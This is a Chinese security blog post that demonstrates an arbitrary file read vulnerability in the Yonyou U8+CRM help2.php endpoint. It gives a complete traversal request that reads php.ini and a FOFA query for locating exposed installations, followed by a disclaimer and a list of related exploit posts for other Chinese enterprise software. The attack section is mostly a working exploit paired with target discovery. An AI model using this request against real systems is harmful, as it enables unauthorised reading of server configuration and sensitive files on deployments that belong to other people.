【复现】用友u8CRM 文件读取漏洞

最新推荐文章于 2024-07-26 16:11:02 发布
最新推荐文章于 2024-07-26 16:11:02 发布
阅读量785 收藏 9
点赞数 23
分类专栏: 安全漏洞 文章标签: 安全 系统安全 web安全 网络安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/135272921
版权

目录

一.概述

二.漏洞复现:

1. 漏洞一:

三. 资产测绘:

四.免责声明:

一.概述

用友U8+CRM 产品简介 《U8+CRM》是一款专为代理销售服务行业设计的集CRM、呼叫中心、OA核心应用于一体,提供前端营销、后端业务处理及员工管理一体化应用的管理软件。

二.漏洞复现:

1. 漏洞一:

(1)漏洞类型:  任意文件读取

(2)请求类型:GET

(3)复现

首页

响应

请求包

GET /pub/help2.php?key=../../apache/php.ini HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

三. 资产测绘:

1.fofa

body="用友U8CRM"

四.免责声明:

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

穿着白衣
关注
专栏目录
用友U8 CRM reservationcomplete.php SQL注入致RCE漏洞复现
0xSec
07-26 1437
用友U8CRM客户关系管理系统reservationcomplete.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞
xiaokp7的博客
07-24 301
用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
华天动力OA TemplateService 任意文件读取漏洞复现
0xSec
12-28 1516
华天动力OA TemplateService接口处存在任意文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
华天动力OA downloadWpsFile接口处任意文件读取漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
07-26 168
华天动力OA downloadWpsFile接口处存在任意 文件读取漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感文件,使系统处于极不安全的状态。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 876
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
用友U8 CRM downloadfile 任意文件读取漏洞复现
0xSec
04-30 665
用友U8CRM客户关系管理系统/pub/downloadfile.php接口处存在任意文件读取漏洞文件身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息,导致系统处于极不安全的状态。
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 620
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理的用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2726
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
用友U8+CRM help2 任意文件读取漏洞复现
0xSec
12-21 1382
​用友 U8 CRM客户关系管理系统help2接口处存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器敏感信息。
用友U8+CRM 逻辑漏洞登录后台漏洞复现
0xSec
01-06 1490
​ 用友 U8 CRM客户关系管理系统reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
漏洞复现】华天动力-OA-workFlowService-sql注入
知黑而守白
01-11 366
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力OA系统中的 workFlowService 接口存在sql注入漏洞。通过恶意构造的输入,攻击者能够成功注入恶意SQL代码,从而执行非授权的数据库查询和操作。这使得攻击者有可能访问、修改或删除敏感信息,危及系统的机密性、完整性和可用性。
漏洞复现】华天动力OA TemplateService接口处存在任意文件读取漏洞
https://blog.echo234.cn/
03-30 665
华天软件有限公司(简称“华天动力”)是国内首批专注于独立OA协同软件研发、为政企提供垂直专业、数智化转型解决方案的科技创新型企业。华天动力OA TemplateService 接口处存在任意文件读取漏洞,攻击者可以利用此漏洞获取系统敏感信息。
华天动力oa-TemplateService-任意文件读取漏洞-未公开day漏洞复现
weixin_43167326的博客
01-20 437
华天动力OA系统中的TemplateService接口存在一个任意文件读取漏洞,攻击者可以通过构造恶意请求,利用该漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。攻击者可能通过利用此漏洞获取敏感信息,导致潜在的信息泄漏风险。。
华天动力OA办公系统存在未授权访问漏洞(新)-漏洞挖掘
weixin_43167326的博客
01-20 908
华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合,为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台,在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。华天动力OA存在未授权访问漏洞,攻击者可以读取用户信息,读取敏感信息等,利用。请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
漏洞复现】蓝凌EIS 智慧协同平台 rpt_listreport_definefield.aspx SQL注入漏洞
qq_67810151的博客
03-04 551
蓝凌EIS智慧协同平台 rpt_listreport_definefield.aspx 接口存在SQL注入漏洞。未授权的攻击者可以通过该漏洞获取数据库敏感信息。
漏洞复现】华天动力-OA-ntkodownload-文件读取
知黑而守白
01-11 197
华天动力OA是一个以技术领先著称的协同软件产品,拥有领先业界的三大核心技术:协同平台、工作流和智能报表,是业内唯一实现协同工具软件、协同应用软件、协同平台融合的协同软件产品,也是业内唯一所有版本统一平台、统一服务、统一升级的协同软件产品。华天动力-OA系统中的ntkodownload接口存在文件读取漏洞。攻击者可以通过发送特定的POST请求,利用该漏洞获取系统敏感文件
漏洞复现】用友NC——文件上传漏洞
weixin_54799594的博客
07-16 1085
漏洞复现过程记录
用友NC mobilereport接口存在SQL注入漏洞
weixin_43167326的博客
04-03 478
用友NC系统是一款全面的企业管理软件,涵盖财务、人力资源、供应链等多个领域,助力企业实现信息化管理和业务优化。此系统某接口存在SQL注入漏洞
用友u8 cloud 反序列化rce漏洞复现
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发现存在反序列化远程命令执行(RCE)漏洞。要复现这个漏洞,首先需要一个能够触发反序列化的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列化数据,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值